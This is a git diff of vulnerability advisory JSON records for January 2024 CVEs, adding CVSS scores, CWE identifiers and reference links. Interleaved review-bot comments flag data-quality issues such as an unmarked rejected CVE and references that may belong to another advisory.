+ "type": "WEB",
+ "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00022.html"
+ },
 {
 "type": "WEB",
 "url": "https://www.mozilla.org/security/advisories/mfsa2024-01/"
@@ -41,9 +48,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-269"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T14:15:38Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json b/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json
index ea75c42f6936c..7f8d0ae1aaec6 100644
--- a/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json
+++ b/advisories/unreviewed/2024/01/GHSA-mw6w-j49q-q324/GHSA-mw6w-j49q-q324.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mw6w-j49q-q324",
- "modified": "2024-01-25T21:32:15Z",
+ "modified": "2024-01-29T18:31:48Z",
 "published": "2024-01-25T21:32:15Z",
 "aliases": [
 "CVE-2023-52046"
 ],
 "details": "Cross Site Scripting vulnerability (XSS) in webmin v.2.105 and earlier allows a remote attacker to execute arbitrary code via a crafted payload to the \"Execute cron job as\" tab Input field.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-25T21:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-mx75-33vj-x5pm/GHSA-mx75-33vj-x5pm.json b/advisories/unreviewed/2024/01/GHSA-mx75-33vj-x5pm/GHSA-mx75-33vj-x5pm.json
new file mode 100644
index 0000000000000..a8be4120b28ee
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-mx75-33vj-x5pm/GHSA-mx75-33vj-x5pm.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mx75-33vj-x5pm",
+ "modified": "2024-01-29T09:30:24Z",
+ "published": "2024-01-29T09:30:24Z",
+ "aliases": [
+ "CVE-2023-45932"
+ ],
+ "details": "Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45932"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T09:15:42Z"
+ }
+}
\ No newline at end of file
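Review bot: The new GHSA-mx75-33vj-x5pm record imports a CVE whose `details` text is a rejection notice ("DO NOT USE THIS CANDIDATE NUMBER ... not a security issue"), yet nothing structured in the record marks it as withdrawn: `severity` and `affected` are empty and `database_specific.severity` is null, which is the same shape as an advisory that merely has no score yet. A consumer filtering on the record's fields cannot distinguish the two without parsing the prose. If this database follows the OSV convention, a top-level `"withdrawn"` timestamp on the record would make the rejection machine-readable; otherwise it may be preferable for the importer to skip rejected candidates entirely. I cannot tell from this hunk whether rejected entries are handled elsewhere in the pipeline.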
diff --git a/advisories/unreviewed/2024/01/GHSA-mxgp-w5v3-c946/GHSA-mxgp-w5v3-c946.json b/advisories/unreviewed/2024/01/GHSA-mxgp-w5v3-c946/GHSA-mxgp-w5v3-c946.json
new file mode 100644
index 0000000000000..65790348232f5
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-mxgp-w5v3-c946/GHSA-mxgp-w5v3-c946.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mxgp-w5v3-c946",
+ "modified": "2024-01-31T18:31:27Z",
+ "published": "2024-01-31T18:31:27Z",
+ "aliases": [
+ "CVE-2024-22292"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Delower WP To Do allows Stored XSS.This issue affects WP To Do: from n/a through 1.2.8.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22292"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/wp-todo/wordpress-wp-to-do-plugin-1-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T18:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json b/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json
index d4b13059a7df6..e8e2db9dca2db 100644
--- a/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json
+++ b/advisories/unreviewed/2024/01/GHSA-mxjq-xrv7-m36q/GHSA-mxjq-xrv7-m36q.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-mxjq-xrv7-m36q",
- "modified": "2024-01-23T21:30:21Z",
+ "modified": "2024-01-29T18:31:48Z",
 "published": "2024-01-23T21:30:21Z",
 "aliases": [
 "CVE-2023-52327"
 ],
 "details": "Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.\n\nPlease note this vulnerability is similar, but not identical to CVE-2023-52328.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json b/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json
index 7c459be0820e5..5fe407a32cb05 100644
--- a/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json
+++ b/advisories/unreviewed/2024/01/GHSA-p52c-9f7h-pxpj/GHSA-p52c-9f7h-pxpj.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p52c-9f7h-pxpj",
- "modified": "2024-01-22T21:31:07Z",
+ "modified": "2024-01-30T15:30:21Z",
 "published": "2024-01-22T21:31:07Z",
 "aliases": [
 "CVE-2024-0606"
 ],
 "details": "An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-22T19:15:09Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json b/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json
index db72150d24134..0b796c7c4f1cd 100644
--- a/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json
+++ b/advisories/unreviewed/2024/01/GHSA-p52v-f53f-hrr6/GHSA-p52v-f53f-hrr6.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p52v-f53f-hrr6",
- "modified": "2024-01-23T21:30:20Z",
+ "modified": "2024-01-29T18:31:47Z",
 "published": "2024-01-23T21:30:20Z",
 "aliases": [
 "CVE-2023-38627"
 ],
 "details": "A post-authenticated server-side request forgery (SSRF) vulnerability in Trend Micro Apex Central 2019 (lower than build 6481) could allow an attacker to interact with internal or local services directly.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis is a similar, but not identical vulnerability as CVE-2023-38626.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-918"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-23T21:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json b/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json
index 9998043a56a51..e6a384fb635ad 100644
--- a/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json
+++ b/advisories/unreviewed/2024/01/GHSA-p5q6-j3pf-jwc7/GHSA-p5q6-j3pf-jwc7.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p5q6-j3pf-jwc7",
- "modified": "2024-01-28T03:30:35Z",
+ "modified": "2024-02-01T21:30:30Z",
 "published": "2024-01-28T03:30:35Z",
 "aliases": [
 "CVE-2024-23742"
 ],
 "details": "An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -27,7 +30,7 @@
 "cwe_ids": [
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-28T03:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-p5vr-h433-qhqr/GHSA-p5vr-h433-qhqr.json b/advisories/unreviewed/2024/01/GHSA-p5vr-h433-qhqr/GHSA-p5vr-h433-qhqr.json
new file mode 100644
index 0000000000000..dea3d74acedce
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-p5vr-h433-qhqr/GHSA-p5vr-h433-qhqr.json
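Review bot: GHSA-p5q6-j3pf-jwc7 now carries `"severity": "CRITICAL"` and a 9.8 vector while its `cwe_ids` array stays empty, and the GHSA-mmx8-j2r4-x8r6 update earlier in this diff has the same shape; every other record in this chunk that gains a severity also gains a CWE. This is presumably just what the upstream NVD entry provides, but a critical-rated record with no weakness class is worth checking against the source before it is used for triage, since consumers that group or filter by CWE will silently drop it. Both hunks are complete within the diff.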
@@ -0,0 +1,66 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p5vr-h433-qhqr",
+ "modified": "2024-01-31T15:30:20Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2023-6779"
+ ],
+ "details": "An off-by-one heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when these functions are called with a message bigger than INT_MAX bytes, leading to an incorrect calculation of the buffer size to store the message, resulting in an application crash. This issue affects glibc 2.37 and newer.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6779"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-6779"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254395"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWQ6BZJ6CV5UAW4VZSKJ6TO4KIW2KWAQ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-01"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.openwall.com/lists/oss-security/2024/01/30/6"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Feb/3"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-122"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T14:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json b/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json
index 34e17028fd60e..0d6d5305f451f 100644
--- a/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json
+++ b/advisories/unreviewed/2024/01/GHSA-p626-3xpc-x4f6/GHSA-p626-3xpc-x4f6.json
@@ -40,7 +40,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-276"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-p687-9x5q-6prq/GHSA-p687-9x5q-6prq.json b/advisories/unreviewed/2024/01/GHSA-p687-9x5q-6prq/GHSA-p687-9x5q-6prq.json
new file mode 100644
index 0000000000000..23b3da393ce5d
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-p687-9x5q-6prq/GHSA-p687-9x5q-6prq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p687-9x5q-6prq",
+ "modified": "2024-02-06T21:30:24Z",
+ "published": "2024-01-30T03:30:30Z",
+ "aliases": [
+ "CVE-2024-21840"
+ ],
+ "details": "Incorrect Default Permissions vulnerability in Hitachi Storage Plug-in for VMware vCenter allows local users to read and write specific files.\n\nThis issue affects Hitachi Storage Plug-in for VMware vCenter: from 04.0.0 through 04.9.2.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21840"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-108/index.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-276"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T03:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-p6rw-gvvh-q8v4/GHSA-p6rw-gvvh-q8v4.json b/advisories/unreviewed/2024/01/GHSA-p6rw-gvvh-q8v4/GHSA-p6rw-gvvh-q8v4.json
new file mode 100644
index 0000000000000..ed2a54130bead
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-p6rw-gvvh-q8v4/GHSA-p6rw-gvvh-q8v4.json
@@ -0,0 +1,75 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p6rw-gvvh-q8v4",
+ "modified": "2024-01-31T15:30:20Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2023-6246"
+ ],
+ "details": "A heap-based buffer overflow was found in the __vsyslog_internal function of the glibc library. This function is called by the syslog and vsyslog functions. This issue occurs when the openlog function was not called, or called with the ident argument set to NULL, and the program name (the basename of argv[0]) is bigger than 1024 bytes, resulting in an application crash or local privilege escalation. This issue affects glibc 2.36 and newer.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6246"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-6246"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2249053"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MWQ6BZJ6CV5UAW4VZSKJ6TO4KIW2KWAQ/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-01"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.openwall.com/lists/oss-security/2024/01/30/6"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176931/glibc-qsort-Out-Of-Bounds-Read-Write.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html"
+ },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Feb/3"
+ },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Feb/5"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-122",
+ "CWE-787"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T14:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-p774-6cp5-x7cj/GHSA-p774-6cp5-x7cj.json b/advisories/unreviewed/2024/01/GHSA-p774-6cp5-x7cj/GHSA-p774-6cp5-x7cj.json
new file mode 100644
index 0000000000000..dad7e866cb922
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-p774-6cp5-x7cj/GHSA-p774-6cp5-x7cj.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p774-6cp5-x7cj",
+ "modified": "2024-01-31T21:31:03Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2023-28807"
+ ],
+ "details": "In Zscaler Internet Access (ZIA) a mismatch between Connect Host and Client Hello's Server Name Indication (SNI) enables attackers to evade network security controls by hiding their communications within legitimate traffic.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28807"
+ },
+ {
+ "type": "WEB",
+ "url": "https://help.zscaler.com/zia/configuring-advanced-settings#dns-optimization"
+ },
+ {
+ "type": "WEB",
+ "url": "https://help.zscaler.com/zia/configuring-advanced-settings#domain-fronting"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-295"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T20:15:44Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json b/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json
index 2aa90c7f1097e..50a6d95ddd2f3 100644
--- a/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json
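Review bot: The reference list of the new GHSA-p6rw-gvvh-q8v4 record (CVE-2023-6246, the `__vsyslog_internal` heap overflow) includes `http://packetstormsecurity.com/files/176931/glibc-qsort-Out-Of-Bounds-Read-Write.html` and `http://seclists.org/fulldisclosure/2024/Feb/5`, whose titles point at a different glibc issue than the one this advisory describes; the sibling record GHSA-p5vr-h433-qhqr for CVE-2023-6779 earlier in this diff lists only the syslog write-up. Upstream reference lists often bundle every link from a single disclosure, so this is probably inherited from NVD rather than introduced here, but it is worth confirming that the two extra references belong on this advisory before they are mirrored further. The GHSA-p774-6cp5-x7cj hunk sharing this line raises nothing.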
+++ b/advisories/unreviewed/2024/01/GHSA-p899-8gh2-v29w/GHSA-p899-8gh2-v29w.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-p899-8gh2-v29w",
- "modified": "2024-01-27T06:30:23Z",
+ "modified": "2024-02-01T06:31:04Z",
 "published": "2024-01-27T06:30:23Z",
 "aliases": [
 "CVE-2023-48201"
 ],
 "details": "Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-27T06:15:47Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-p969-49ff-hx55/GHSA-p969-49ff-hx55.json b/advisories/unreviewed/2024/01/GHSA-p969-49ff-hx55/GHSA-p969-49ff-hx55.json
new file mode 100644
index 0000000000000..11379996017bb
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-p969-49ff-hx55/GHSA-p969-49ff-hx55.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p969-49ff-hx55",
+ "modified": "2024-01-31T21:31:03Z",
+ "published": "2024-01-31T21:31:03Z",
+ "aliases": [
+ "CVE-2024-1115"
+ ],
+ "details": "A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function dlfile of the file /application/websocket/controller/Setting.php. The manipulation of the argument phpPath leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252473 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1115"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/81JmiyogcYL7"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252473"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252473"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T20:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json b/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json
new file mode 100644
index 0000000000000..d23a972739550
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pcgj-qq2c-qx79",
+ "modified": "2024-01-29T18:31:49Z",
+ "published": "2024-01-29T18:31:49Z",
+ "aliases": [
+ "CVE-2024-1007"
+ ],
+ "details": "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file edit_profile.php. The manipulation of the argument txtfullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252276.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1007"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252276"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252276"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.youtube.com/watch?v=1yesMwvWcL4"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T16:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json b/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json
index 881782a16ee85..c63ee8c4dc054 100644
--- a/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json
+++ b/advisories/unreviewed/2024/01/GHSA-pcjv-393q-rqf2/GHSA-pcjv-393q-rqf2.json
@@ -25,6 +25,42 @@
 "type": "WEB",
 "url": "https://access.redhat.com/errata/RHSA-2024:0320"
 },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0557"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0558"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0597"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0607"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0614"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0617"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0621"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0626"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2024:0629"
+ },
 {
 "type": "WEB",
 "url": "https://access.redhat.com/security/cve/CVE-2023-6816"
@@ -45,6 +81,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EJBMCWQ54R6ZL3MYU2D2JBW6JMZL7BQW/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-30"
+ },
 {
 "type": "WEB",
 "url": "http://www.openwall.com/lists/oss-security/2024/01/18/1"
diff --git a/advisories/unreviewed/2024/01/GHSA-pffw-7p63-vrmg/GHSA-pffw-7p63-vrmg.json b/advisories/unreviewed/2024/01/GHSA-pffw-7p63-vrmg/GHSA-pffw-7p63-vrmg.json
new file mode 100644
index 0000000000000..c321202053b96
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-pffw-7p63-vrmg/GHSA-pffw-7p63-vrmg.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pffw-7p63-vrmg",
+ "modified": "2024-01-30T00:30:29Z",
+ "published": "2024-01-30T00:30:29Z",
+ "aliases": [
+ "CVE-2024-1022"
+ ],
+ "details": "A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
